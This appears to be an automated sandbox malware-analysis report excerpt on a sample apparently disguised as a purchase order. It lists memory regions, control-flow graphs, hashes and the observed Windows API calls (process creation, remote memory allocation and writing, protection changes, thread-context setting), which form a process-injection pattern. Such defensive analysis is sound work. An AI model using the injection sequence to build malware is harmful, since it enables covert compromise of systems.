                                              control_flow_graph 785 5e20538-5e205ca 788 5e20613-5e2063b 785->788 789 5e205cc-5e205e3 785->789 792 5e20681-5e206d7 788->792 793 5e2063d-5e20651 788->793 789->788 794 5e205e5-5e205ea 789->794 802 5e206d9-5e206ed 792->802 803 5e2071d-5e207b2 CreateProcessA 792->803 793->792 804 5e20653-5e20658 793->804 795 5e205ec-5e205f6 794->795 796 5e2060d-5e20610 794->796 799 5e205fa-5e20609 795->799 800 5e205f8 795->800 796->788 799->799 801 5e2060b 799->801 800->799 801->796 802->803 811 5e206ef-5e206f4 802->811 818 5e207b4-5e207ba 803->818 819 5e207bb-5e20831 803->819 805 5e2065a-5e20664 804->805 806 5e2067b-5e2067e 804->806 808 5e20666 805->808 809 5e20668-5e20677 805->809 806->792 808->809 809->809 812 5e20679 809->812 813 5e206f6-5e20700 811->813 814 5e20717-5e2071a 811->814 812->806 816 5e20702 813->816 817 5e20704-5e20713 813->817 814->803 816->817 817->817 820 5e20715 817->820 818->819 825 5e20833-5e20837 819->825 826 5e20841-5e20845 819->826 820->814 825->826 827 5e20839 825->827 828 5e20847-5e2084b 826->828 829 5e20855-5e20859 826->829 827->826 828->829 832 5e2084d 828->832 830 5e2085b-5e2085f 829->830 831 5e20869 829->831 830->831 833 5e20861 830->833 834 5e2086a 831->834 832->829 833->831 834->834
                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05E2079F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 2bdf16fcc0c5d527b16c37b27a64080a8a149651362df352045a885288e0920a
                                              • Instruction ID: 5360bfc2205ac6a85e2c87b4f975b23d7d7759c35b851f448d0b47b2eab9bf81
                                              • Opcode Fuzzy Hash: 2bdf16fcc0c5d527b16c37b27a64080a8a149651362df352045a885288e0920a
                                              • Instruction Fuzzy Hash: EBA10771D00228CFDF14CFA9C8497EEBBF1BB49314F14A169E899A7284DB748985CF85

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1143 5e20fa8-5e20faa 1144 5e20fb1-5e2101b 1143->1144 1145 5e20fac 1143->1145 1147 5e21032-5e21093 WriteProcessMemory 1144->1147 1148 5e2101d-5e2102f 1144->1148 1145->1144 1150 5e21095-5e2109b 1147->1150 1151 5e2109c-5e210ee 1147->1151 1148->1147 1150->1151
                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 05E21083
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 8a3be08eb3ad70cfb67001a7a356a5efb34cb13c8f18811e4a67b0f251e4df43
                                              • Instruction ID: 100f824358fcd6ca728a4166f0233c26dcb550d8385f84c45560ccc72b5ca6e4
                                              • Opcode Fuzzy Hash: 8a3be08eb3ad70cfb67001a7a356a5efb34cb13c8f18811e4a67b0f251e4df43
                                              • Instruction Fuzzy Hash: 8241A8B4D01258DFDF14CFAAD984AEEBBF1BB49310F14902AE859B7200D375AA45CB54

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1156 5e20fb0-5e2101b 1159 5e21032-5e21093 WriteProcessMemory 1156->1159 1160 5e2101d-5e2102f 1156->1160 1162 5e21095-5e2109b 1159->1162 1163 5e2109c-5e210ee 1159->1163 1160->1159 1162->1163
                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 05E21083
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 125773d0182c478011388be6e9f95485aeb3895c89efc3c4fc82cf318a225044
                                              • Instruction ID: 2d8b0a78126d9ebc8d53abfded2a4e78e6f3468efb60271f749c41decf099a75
                                              • Opcode Fuzzy Hash: 125773d0182c478011388be6e9f95485aeb3895c89efc3c4fc82cf318a225044
                                              • Instruction Fuzzy Hash: FF41A8B4D012589FDB04CFAAD984AEEFBF1BB49310F14902AE819B7200D775AA41CB64
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d
                                              • API String ID: 0-2564639436
                                              • Opcode ID: 60d0635ccaf66d09396235b2caadc209fd14859b0528680dbe5b5316db0b67cf
                                              • Instruction ID: 547a7c7b11478eceefb0d214a4f16e29e578aa7f6eb7851a0c2016a0826a310b
                                              • Opcode Fuzzy Hash: 60d0635ccaf66d09396235b2caadc209fd14859b0528680dbe5b5316db0b67cf
                                              • Instruction Fuzzy Hash: 15E16935600605CFCB14CF69C484A6ABBF2FFC9710B1989ADD85A8B7A1DB30F945CB94
                                              APIs
                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05E20EFA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 97f30efe88a83091981d69386b626c31edf92f13b90b0cec704060b579ba2f70
                                              • Instruction ID: 8ff5328193c4de837d2b89ff725c0c87ed4202ae5a079f1e167459788d0b2c2c
                                              • Opcode Fuzzy Hash: 97f30efe88a83091981d69386b626c31edf92f13b90b0cec704060b579ba2f70
                                              • Instruction Fuzzy Hash: 9A31A6B8D04258DFDF10CFA9D985A9EFBB1BB49310F14A02AE815B7250D735A902CF68
                                              APIs
                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05E21544
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 5a8ca28111cb5795fd0e997e73c849a618052093f81cc4a96b98de63c6a1bb55
                                              • Instruction ID: f09a23deffbde64114e9cf2e245751f9cd02165a93f57220d55c9d6f229714bd
                                              • Opcode Fuzzy Hash: 5a8ca28111cb5795fd0e997e73c849a618052093f81cc4a96b98de63c6a1bb55
                                              • Instruction Fuzzy Hash: 5C31E8B4C00258DFDF14CFAAD980AEEFBB0BB49310F14942AE855B7210D735AA45CF94
                                              APIs
                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05E20EFA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: eef79151a6005b7b9a268baeb89b006e131df2bb5994db30fa21b05ff64fa362
                                              • Instruction ID: 45fa2e64bcda38a93a7824ff6af7c08f2a05bd003ea24cb460547a83f60cc40c
                                              • Opcode Fuzzy Hash: eef79151a6005b7b9a268baeb89b006e131df2bb5994db30fa21b05ff64fa362
                                              • Instruction Fuzzy Hash: 5731A8B8D04258DFDF10CFA9D984ADEFBB1BB49310F14A42AE815B7250D735A902CF54
                                              APIs
                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05E21544
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 480558b015442911654f0cde54935950dd0b1a68af7f955fdfc8c24b7a8badb9
                                              • Instruction ID: 608ec7443bb9372c1148f682f2032218f08e7c0343f0c57dbbcfd72d981f3d7d
                                              • Opcode Fuzzy Hash: 480558b015442911654f0cde54935950dd0b1a68af7f955fdfc8c24b7a8badb9
                                              • Instruction Fuzzy Hash: 0C31B8B5D00258DFCB14CFAAD980AEEFBF1BB49310F14942AE855B7210D735AA45CF94
                                              APIs
                                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 05EED58C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486576798.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5ee0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 53cc0688e130ae44ce31d8283d69d81970159403aa98bcd51b332625eb68a4ca
                                              • Instruction ID: d0a89e828ff0de37a061b55f2c67036d6e309633d8e3428d595169801cf2f59d
                                              • Opcode Fuzzy Hash: 53cc0688e130ae44ce31d8283d69d81970159403aa98bcd51b332625eb68a4ca
                                              • Instruction Fuzzy Hash: 3931A8B4D00248DFDB10CFA9D980A9EFBB1BB49310F14942AE815B7210D735A9468F54
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 05E2099F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: d9784e87761d82ba9f3493244b4b99625e851ee59c6b3e793bbbb73c0f27bf21
                                              • Instruction ID: 9282f60eaa75b679e9d97f0dcada367536cf4f4e2a3d99b6ea832540cb2163d4
                                              • Opcode Fuzzy Hash: d9784e87761d82ba9f3493244b4b99625e851ee59c6b3e793bbbb73c0f27bf21
                                              • Instruction Fuzzy Hash: 3641DBB4D00258DFDB10CFAAD885AEEFBF1BB88310F14902AE459B7240C738A945CF54
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 05E2099F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 23b16496a8ee6cd5162a271a321c141a009860e9fb1b7d30af5056b5b919cd33
                                              • Instruction ID: e2d5c61735ffade1b50d91d4cc0d6f4d543647076ba1f5f261fdbb7febb966a2
                                              • Opcode Fuzzy Hash: 23b16496a8ee6cd5162a271a321c141a009860e9fb1b7d30af5056b5b919cd33
                                              • Instruction Fuzzy Hash: B831BBB4D00258DFDB10CFAAD884AEEFBF1BB89314F14902AE459B7240D779A945CF54
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RAb
                                              • API String ID: 0-2248548345
                                              • Opcode ID: 1acf4afdd0ce8c5585041175ddc65149ba0c4a25d2306e96b9a87ead5e5a980b
                                              • Instruction ID: ce033b28df9123dbefd87cdd9bf460bc236f106af3a5dc7c7d204a7b6e4d6f73
                                              • Opcode Fuzzy Hash: 1acf4afdd0ce8c5585041175ddc65149ba0c4a25d2306e96b9a87ead5e5a980b
                                              • Instruction Fuzzy Hash: 2551C274D01208DFDB18DFAAD548AADBBF2FF89300F20946AD816AB364DB359945CF50
                                              APIs
                                              • VirtualAlloc.KERNEL32(?,?,?,?), ref: 05EEE74F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486576798.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5ee0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 95d7f62e118af8af3d003eb5c4361827142602dc11a3e89bbaba19e7b6ba5649
                                              • Instruction ID: 7e7cd3c07328fcefcc8a4c5062d7e98ef3bcbe0b408afe2e0288d7ed49c05e08
                                              • Opcode Fuzzy Hash: 95d7f62e118af8af3d003eb5c4361827142602dc11a3e89bbaba19e7b6ba5649
                                              • Instruction Fuzzy Hash: 8B31A7B9D002489FDF10CFA9D884A9EFBB5BB49310F14942AE815B7210D735A945CF94
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: R
                                              • API String ID: 0-1466425173
                                              • Opcode ID: 5f09caf2042ceb1b027ef0a69316757d4000a6147618585ad0074fb2b5be2b37
                                              • Instruction ID: 52478efec7c3cf9040e0044ba73bbaebbb83a0d438cfa85f230c1d907f570d20
                                              • Opcode Fuzzy Hash: 5f09caf2042ceb1b027ef0a69316757d4000a6147618585ad0074fb2b5be2b37
                                              • Instruction Fuzzy Hash: 9B21C574D41228CFEB64DF24C854B99BBB2FF99300F0045D9D40AA7390DB326EA48F45
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: _
                                              • API String ID: 0-701932520
                                              • Opcode ID: 7dd43bde4bf790e6010e0b0e3fa43bab86d47e68f3ab0e56a14fdbd40f1b4487
                                              • Instruction ID: 15869e80ab050b1ac97241279bd0a6e432a9bc1e33c10910ca7321b713390c65
                                              • Opcode Fuzzy Hash: 7dd43bde4bf790e6010e0b0e3fa43bab86d47e68f3ab0e56a14fdbd40f1b4487
                                              • Instruction Fuzzy Hash: DAF0DA70904768CFEB64CF18DC48B9AB7B1FB45302F0055E5D009A7294DB742E84CF01
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: K
                                              • API String ID: 0-856455061
                                              • Opcode ID: 46297e51ea1d6c3bb8105c54813c50819fb41cb142b000f25e655e90a1acbfba
                                              • Instruction ID: 41b85bab954520ecb162f22db7854321051e88ed887c6171a3fdf4e8df8b2aef
                                              • Opcode Fuzzy Hash: 46297e51ea1d6c3bb8105c54813c50819fb41cb142b000f25e655e90a1acbfba
                                              • Instruction Fuzzy Hash: 46F07F749022298FDBA4EF14CC88AADB7B1EB48300F1142D5D81D63325DB356E90CF50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cb73f7758a916acdad869c6d76f37bbb3291df4c9505b3a3b72d491ebc1698f3
                                              • Instruction ID: edfd4997c7ac44dea50d1c1c9c7f8de70fa9d9a3f5b8df8eb6c6238016157b64
                                              • Opcode Fuzzy Hash: cb73f7758a916acdad869c6d76f37bbb3291df4c9505b3a3b72d491ebc1698f3
                                              • Instruction Fuzzy Hash: 61522975A002288FDB28CF69C985BEDBBF2BF88300F5545D9E549A7351DA309E80CF61
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485533832.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5ca0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b6eb24d8dd1abd77f95184db957c5ab8661d3aeeeb3d7851400139725f09b46b
                                              • Instruction ID: 3a5ccae19d8dd2fe0e5eceaf4ea3360565b35fd771684d1d984645a672fad22f
                                              • Opcode Fuzzy Hash: b6eb24d8dd1abd77f95184db957c5ab8661d3aeeeb3d7851400139725f09b46b
                                              • Instruction Fuzzy Hash: 8342E735E0421ACFDB14DFE9D948ABEBBB2FB89309F148419E912A7354DB345982CF50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4d6c55bf1590ae055f89f642a4d2a8580ff78ed9ba19bea604f5e7aa2a935add
                                              • Instruction ID: 14c722f377c30818436b017e607b1c5833d1863ebf9c23013bca167c6e32886d
                                              • Opcode Fuzzy Hash: 4d6c55bf1590ae055f89f642a4d2a8580ff78ed9ba19bea604f5e7aa2a935add
                                              • Instruction Fuzzy Hash: 1D228E31A002149FDB18DF59C594A6DBBF2BF88310F1484A9E946EF3A1DB71ED81CB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6e8030ebaf7f93a83f866fa4014f072d0a65863bfb47e68decf96c3256c6493c
                                              • Instruction ID: 6e81d8609930dfc45c4574131e98fee48132ece6d1e400d38f583cf92a12eb95
                                              • Opcode Fuzzy Hash: 6e8030ebaf7f93a83f866fa4014f072d0a65863bfb47e68decf96c3256c6493c
                                              • Instruction Fuzzy Hash: CB125C31A006049FDB24DFA5D494AAEBBF2FF88300F2489ADE5469B394DB71ED45CB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f2d0dff0398be2f982cbe2c402e65984a915963a2483a337c342f08c94a68a0b
                                              • Instruction ID: 1baa2e311ebfb3cc4c81446c7065038c2bb32a42dba7442e3407f90613f533d8
                                              • Opcode Fuzzy Hash: f2d0dff0398be2f982cbe2c402e65984a915963a2483a337c342f08c94a68a0b
                                              • Instruction Fuzzy Hash: D0F1BC70B082828FDB199F69C85166A7FF2AF84300F1549BDE587CB3D1DA34D981CB65
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a20743bfd7b45ee76c73072ed462a6f3cd8cf7b91e1c79ef4c86e13306f567a3
                                              • Instruction ID: d6417a3994aad7592346a11e77cccf6bd5733231fe9adcd065d14b0a274eee40
                                              • Opcode Fuzzy Hash: a20743bfd7b45ee76c73072ed462a6f3cd8cf7b91e1c79ef4c86e13306f567a3
                                              • Instruction Fuzzy Hash: 0412D734B102198FCB14EF64C898A9DBBB2BF89300F5199ACD54AAB355DF31AD85CF50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 78050c9a4f0b422ca4e393262967606ae8e53fcf2f11cebafdbb8b321e434988
                                              • Instruction ID: 48cda95f67ab7d392142dc5f39979e0b557e8ebd4a8d78e3c35eb68784b64bb0
                                              • Opcode Fuzzy Hash: 78050c9a4f0b422ca4e393262967606ae8e53fcf2f11cebafdbb8b321e434988
                                              • Instruction Fuzzy Hash: F7F1EC34B10118DFCB08DFA4D999AADBBB2FF89305F554598E446AB3A1DB71EC42CB40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5b0363cf095b98fd7eefb80c94964792f1c6f013d9377dc56a37a860d6feaa2c
                                              • Instruction ID: 3f5e60307aed88d89fa01170005f75c950bd0d0088477988cb727d421adb9f0b
                                              • Opcode Fuzzy Hash: 5b0363cf095b98fd7eefb80c94964792f1c6f013d9377dc56a37a860d6feaa2c
                                              • Instruction Fuzzy Hash: D5F12334A00209DFCB14EFA4D49899DBBB2FF89300F5589ADE4055B365DB30ED85CB91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485533832.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5ca0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a72a4e638ad71b3e154e1e587ea7920879bbffbdfb8f0fc543b3c115074969df
                                              • Instruction ID: a1237fb18e03373a0e792929b6bfbdfc6d601c491003879fef84aab7afae6ffa
                                              • Opcode Fuzzy Hash: a72a4e638ad71b3e154e1e587ea7920879bbffbdfb8f0fc543b3c115074969df
                                              • Instruction Fuzzy Hash: CBF10234E01219DFDB18DFA5E5886ACBBB2FF89309F245929E406A7354DB355D81CF40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 770affd5dd836111b86e6ab2c84142a87b1be0611560db89bde23b9fa394f5f7
                                              • Instruction ID: dd58b907d87df2835ad392a01c3b9b1fe1f73876e2aa25248c6c1498871cc8f5
                                              • Opcode Fuzzy Hash: 770affd5dd836111b86e6ab2c84142a87b1be0611560db89bde23b9fa394f5f7
                                              • Instruction Fuzzy Hash: 56B1D0323046148FDB199F69D844BAE3BE6FFC8611B2444ADE806CB391DB35DD46CB91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d75b70c62abf65d6a5216009ff72967248858863da610016260bb552b09512f4
                                              • Instruction ID: c243d850b16da7bda763fa60caa8705366215bfb027225bf611217cf17ae686c
                                              • Opcode Fuzzy Hash: d75b70c62abf65d6a5216009ff72967248858863da610016260bb552b09512f4
                                              • Instruction Fuzzy Hash: 63C15D75A002188FDB18CBA9D985BDDBBF6FF88700F1584D9E549AB390DA309D81CF61
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 314c0a2307bd776f35a73ee5d0484c49af20addbd61d28552731a0df5c783059
                                              • Instruction ID: b6ecf39b454d68bd1b4dbb69adc34ec8d0d76026665a14417243a03ea1c910f2
                                              • Opcode Fuzzy Hash: 314c0a2307bd776f35a73ee5d0484c49af20addbd61d28552731a0df5c783059
                                              • Instruction Fuzzy Hash: 2B919C39B012049FCB14DFA5D995AADBBB2FF88311F1484A9E842EB390CB31DD41CB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4d73d9193852bc5d6a2bcffeeef5d047ae0d199e61754ab1ba507e34acda0e12
                                              • Instruction ID: f732d85601ea70a28df707e815267e4b2dd18a6a7b24c0e681c82f06f130a26b
                                              • Opcode Fuzzy Hash: 4d73d9193852bc5d6a2bcffeeef5d047ae0d199e61754ab1ba507e34acda0e12
                                              • Instruction Fuzzy Hash: BB91F234B002048FDB14DF69C884A6E7BE6FF89710B2544A9E506DB3A1DB71ED81CB91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485533832.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5ca0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 75f079a94c6953df2d242a7e1a6d41fcdf9eeeed8a29cc14499397f916b58277
                                              • Instruction ID: d7d6d591bf80907b11fd31da3d00d370f6356d734464f48b2b72a34a452a59a4
                                              • Opcode Fuzzy Hash: 75f079a94c6953df2d242a7e1a6d41fcdf9eeeed8a29cc14499397f916b58277
                                              • Instruction Fuzzy Hash: 64A1FA35E0421ACFCB19DFA5D4486EEBBB2FF89309F189829D412A7394CB345982CF50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 590bf2200e6ce6a2b9391f6c900911ec726179d2cb36e4e0880839ef60d19129
                                              • Instruction ID: 1e9513f9f1013cc4041a054b54c3df44c43d07cd03d22d9def1e7fd0eb8e07dc
